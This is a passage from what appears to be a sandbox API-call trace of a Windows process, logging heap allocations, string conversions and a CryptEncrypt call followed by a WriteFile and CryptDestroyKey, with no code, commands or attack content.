Size=0x24) returned 0x17e2b18 [0120.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0120.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0120.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0120.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0120.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0120.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0120.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0120.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0120.377] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.377] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0120.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0120.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0120.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0120.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0120.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43caf58 [0120.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caf58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0120.377] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49b1a38*, pdwDataLen=0x144e790*=0x17a26, dwBufLen=0x17a30 | out: pbData=0x49b1a38*, pdwDataLen=0x144e790*=0x17a30) returned 1 [0120.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0120.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea040 [0120.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0120.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0120.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0120.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0120.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0120.378] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0120.378] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0120.378] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0120.379] WriteFile (in: hFile=0x258, lpBuffer=0x452da48*, nNumberOfBytesToWrite=0x17a30, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x452da48*, lpNumberOfBytesWritten=0x144f194*=0x17a30, lpOverlapped=0x0) returned 1 [0120.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0120.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x452da48 | out: hHeap=0x1780000) returned 1 [0120.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0120.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0120.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0120.382] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0120.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0120.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0120.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0120.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0120.382] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0120.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0120.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0120.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0120.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0120.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0120.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0120.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca778 [0120.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0120.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6a0 [0120.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca598 [0120.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0120.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca610 [0120.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca538 [0120.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0120.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392298 [0120.382] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0120.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392298 | out: hHeap=0x1780000) returned 1 [0120.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0120.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0120.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2740 [0120.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0120.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0120.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0120.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0120.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca730 [0120.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0120.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0120.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0120.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0120.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0120.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0120.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0120.383] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0120.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0120.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0120.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0120.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0120.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0120.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0120.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0120.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0120.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0120.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0120.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0120.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392420 [0120.383] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392420 | out: hHeap=0x1780000) returned 1 [0120.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0120.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca988 [0120.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0120.384] PeekMessageW (in: lpMsg=0x144e96c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e96c) returned 0 [0120.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0120.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0120.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0120.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0120.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0120.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0120.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0120.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0120.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0120.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0120.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0120.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0120.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0120.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0120.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0120.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0120.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0120.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0120.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0120.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0120.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0120.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0120.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0120.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0120.384] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0120.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0120.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0120.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0120.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0120.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0120.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0120.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0120.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0120.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0120.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0120.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0120.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0120.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0120.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0120.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0120.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0120.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0120.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0120.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0120.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0120.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0120.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43caa78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0120.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0120.385] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0120.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0120.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0120.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0120.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0120.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0120.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0120.386] CryptDestroyKey (hKey=0x41ac640) returned 1 [0120.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0120.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8f00 [0120.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0120.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0120.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0120.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0120.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0120.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0120.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0120.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0120.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0120.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0120.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0120.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0120.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0120.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0120.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0120.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0120.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0120.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0120.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0120.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0120.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0120.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0120.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0120.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0120.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0120.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0120.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0120.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0120.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0120.387] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0120.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0120.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0120.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0120.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0120.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0120.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0120.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0120.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9350 [0120.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0120.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0120.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0120.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0120.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0120.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0120.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0120.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0120.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0120.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0120.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0120.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0120.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0120.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8ab0 [0120.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0120.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8ab0 | out: hHeap=0x1780000) returned 1 [0120.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0120.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0120.388] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0120.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0120.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0120.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0120.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0120.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0120.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0120.388] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0120.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0120.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0120.388] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0120.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0120.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0120.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7d8 [0120.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0120.388] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0120.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0120.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392260 [0120.388] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0120.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392260 | out: hHeap=0x1780000) returned 1 [0120.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0120.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca868 [0120.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0120.389] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0120.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0120.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 